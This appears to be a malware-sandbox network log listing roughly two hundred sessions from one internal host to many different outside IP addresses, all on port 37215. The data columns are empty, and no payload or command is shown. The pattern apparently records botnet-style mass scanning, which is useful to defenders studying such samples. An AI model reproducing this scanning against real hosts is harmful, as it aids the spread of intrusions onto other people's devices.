                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12433192.168.2.135683241.97.253.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12434192.168.2.134784864.12.87.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12435192.168.2.133885441.223.68.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12436192.168.2.1350258174.118.165.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12437192.168.2.1348614197.213.204.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12438192.168.2.1358694187.25.46.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12439192.168.2.1354648197.167.46.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12440192.168.2.1358408197.123.105.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12441192.168.2.1347358157.117.202.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12442192.168.2.133768041.147.15.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12443192.168.2.135782641.66.133.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12444192.168.2.1345312157.65.235.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12445192.168.2.1360708103.255.13.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12446192.168.2.133780041.141.130.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12447192.168.2.1352886197.157.85.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12448192.168.2.1348230184.191.206.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12449192.168.2.1354612157.58.216.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12450192.168.2.1354628157.213.60.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12451192.168.2.1334222148.41.209.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12452192.168.2.1336372197.46.226.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12453192.168.2.1353308157.199.240.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12454192.168.2.1334090157.27.7.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12455192.168.2.1343668195.107.213.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12456192.168.2.1349692197.124.188.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12457192.168.2.1359716157.59.149.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12458192.168.2.1341104157.216.224.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12459192.168.2.1348100157.252.173.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12460192.168.2.1334100197.213.50.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12461192.168.2.1348722197.215.227.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12462192.168.2.135761241.168.157.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12463192.168.2.136050641.169.231.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12464192.168.2.1337598157.120.99.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12465192.168.2.1357412157.222.97.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12466192.168.2.1333830197.35.68.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12467192.168.2.1350544197.19.148.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12468192.168.2.134111241.207.106.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12469192.168.2.1351312197.214.158.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12470192.168.2.133784841.98.129.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12471192.168.2.1339572197.11.62.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12472192.168.2.1343456197.98.151.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12473192.168.2.1347712129.25.70.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12474192.168.2.135818241.101.31.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12475192.168.2.135050041.99.221.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12476192.168.2.1337060157.133.216.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12477192.168.2.135912441.184.87.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12478192.168.2.1343668157.164.174.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12479192.168.2.1343438157.161.2.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12480192.168.2.1336208157.252.164.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12481192.168.2.133438860.200.132.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12482192.168.2.1351372157.96.189.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12483192.168.2.1336470223.230.199.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12484192.168.2.1348758157.183.80.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12485192.168.2.1355108197.222.140.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12486192.168.2.1348418157.76.205.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12487192.168.2.135452241.45.82.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12488192.168.2.134327641.102.5.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12489192.168.2.1346268157.183.36.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12490192.168.2.133689841.88.8.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12491192.168.2.134348412.142.149.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12492192.168.2.1348940157.203.143.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12493192.168.2.134744241.85.152.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12494192.168.2.135069441.18.72.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12495192.168.2.1336338197.161.128.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12496192.168.2.1352600197.215.150.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12497192.168.2.1354974157.142.5.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12498192.168.2.1338620197.129.85.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12499192.168.2.1353922197.106.151.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12500192.168.2.1349976197.18.51.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12501192.168.2.134195441.48.136.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12502192.168.2.1346996197.29.220.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12503192.168.2.1347616197.85.119.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12504192.168.2.133322849.59.13.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12505192.168.2.1338166197.129.186.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12506192.168.2.134063041.112.194.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12507192.168.2.134598841.124.179.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12508192.168.2.1336026197.71.92.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12509192.168.2.134910041.162.64.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12510192.168.2.1349412197.39.119.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12511192.168.2.1352004157.68.91.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12512192.168.2.1354444157.78.136.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12513192.168.2.134767497.195.224.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12514192.168.2.1341774197.186.240.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12515192.168.2.1336172147.226.223.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12516192.168.2.1333580157.120.27.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12517192.168.2.133510053.61.253.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12518192.168.2.1344202157.189.132.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12519192.168.2.135865841.231.40.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12520192.168.2.1344494157.199.53.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12521192.168.2.133540041.16.179.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12522192.168.2.1348494197.139.229.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12523192.168.2.133925841.65.244.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12524192.168.2.134896241.129.99.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12525192.168.2.1360322157.9.153.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12526192.168.2.1333136106.211.114.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12527192.168.2.1336248157.121.91.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12528192.168.2.1352238103.200.240.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12529192.168.2.134698641.215.143.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12530192.168.2.1346080157.35.219.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12531192.168.2.133848241.156.167.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12532192.168.2.1344912197.91.128.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12533192.168.2.135530841.220.94.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12534192.168.2.1355176204.186.84.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12535192.168.2.1359850157.117.154.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12536192.168.2.1333774197.148.29.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12537192.168.2.1347934176.81.82.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12538192.168.2.1354672197.244.101.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12539192.168.2.1347168157.79.68.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12540192.168.2.1343900197.138.56.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12541192.168.2.1350128157.167.167.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12542192.168.2.1343508157.221.117.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12543192.168.2.1358430157.170.180.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12544192.168.2.133351641.17.214.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12545192.168.2.135345641.4.199.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12546192.168.2.1350628197.211.214.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12547192.168.2.1337758197.136.200.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12548192.168.2.135312041.212.50.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12549192.168.2.1343528197.215.188.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12550192.168.2.1356756142.137.169.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12551192.168.2.1353806197.3.141.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12552192.168.2.1350062157.76.212.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12553192.168.2.1356062117.211.13.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12554192.168.2.1346032197.216.29.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12555192.168.2.135042641.75.110.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12556192.168.2.1346410157.46.253.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12557192.168.2.1334906197.190.221.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12558192.168.2.1336734208.239.72.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12559192.168.2.1333498197.47.172.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12560192.168.2.1340768157.208.75.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12561192.168.2.1358598197.164.3.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12562192.168.2.135624441.139.142.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12563192.168.2.134526023.219.41.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12564192.168.2.1334244197.211.167.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12565192.168.2.1356204197.108.23.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12566192.168.2.1339628157.55.208.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12567192.168.2.1356940197.122.208.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12568192.168.2.1345118184.46.6.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12569192.168.2.1332820197.143.180.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12570192.168.2.1337310197.109.226.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12571192.168.2.135612841.52.208.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12572192.168.2.135471241.34.70.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12573192.168.2.1356744157.232.6.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12574192.168.2.1336510157.94.254.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12575192.168.2.136027841.51.95.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12576192.168.2.1334850197.233.192.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12577192.168.2.1352416157.83.18.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12578192.168.2.134351841.225.68.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12579192.168.2.135054219.131.148.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12580192.168.2.1341722103.70.3.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12581192.168.2.1339436103.118.136.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12582192.168.2.135270041.212.89.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12583192.168.2.135889641.25.17.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12584192.168.2.1357714197.245.198.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12585192.168.2.134808641.255.26.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12586192.168.2.135681241.36.169.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12587192.168.2.1355346197.212.226.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12588192.168.2.1337178157.154.233.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12589192.168.2.1355174197.145.109.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12590192.168.2.135323441.214.172.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12591192.168.2.1340820160.22.37.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12592192.168.2.1338672197.125.28.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12593192.168.2.1337600197.244.219.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12594192.168.2.1351922157.88.240.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12595192.168.2.1355180157.5.212.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12596192.168.2.1339750157.136.202.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12597192.168.2.1343908197.79.59.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12598192.168.2.1356696197.122.45.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12599192.168.2.135732893.211.46.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12600192.168.2.134824641.197.166.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12601192.168.2.1343906171.161.169.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12602192.168.2.135451441.217.225.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12603192.168.2.1344568220.136.150.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12604192.168.2.135338841.112.122.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12605192.168.2.1353428197.29.59.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12606192.168.2.1346562197.11.112.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12607192.168.2.133528451.196.117.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12608192.168.2.1337166197.201.13.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12609192.168.2.1333902157.168.169.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12610192.168.2.1332852197.155.62.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12611192.168.2.1354538153.193.94.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12612192.168.2.1345926157.232.95.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12613192.168.2.133910041.81.171.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12614192.168.2.1357294157.73.4.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12615192.168.2.1354068180.150.68.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12616192.168.2.134968441.100.110.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12617192.168.2.1341986197.182.61.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12618192.168.2.1334744223.210.223.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12619192.168.2.1345182157.167.17.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12620192.168.2.135080041.18.138.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12621192.168.2.135389249.218.161.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12622192.168.2.1339016157.190.6.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12623192.168.2.1351090197.93.36.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12624192.168.2.135945641.214.184.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12625192.168.2.134339241.220.181.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12626192.168.2.1337124165.86.211.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12627192.168.2.1355406210.60.216.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12628192.168.2.134452641.132.126.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12629192.168.2.1340070157.84.77.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12630192.168.2.1333906157.244.205.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12631192.168.2.1343204157.144.215.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12632192.168.2.134183441.51.229.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12633192.168.2.134314241.173.156.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12634192.168.2.135030239.78.59.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12635192.168.2.135817080.134.225.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12636192.168.2.1357634197.247.69.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12637192.168.2.1348262200.232.127.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12638192.168.2.1349482168.210.250.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12639192.168.2.1333998197.33.228.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12640192.168.2.1349340197.17.56.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12641192.168.2.134539841.86.215.15937215
                                                  TimestampBytes transferredDirectionData


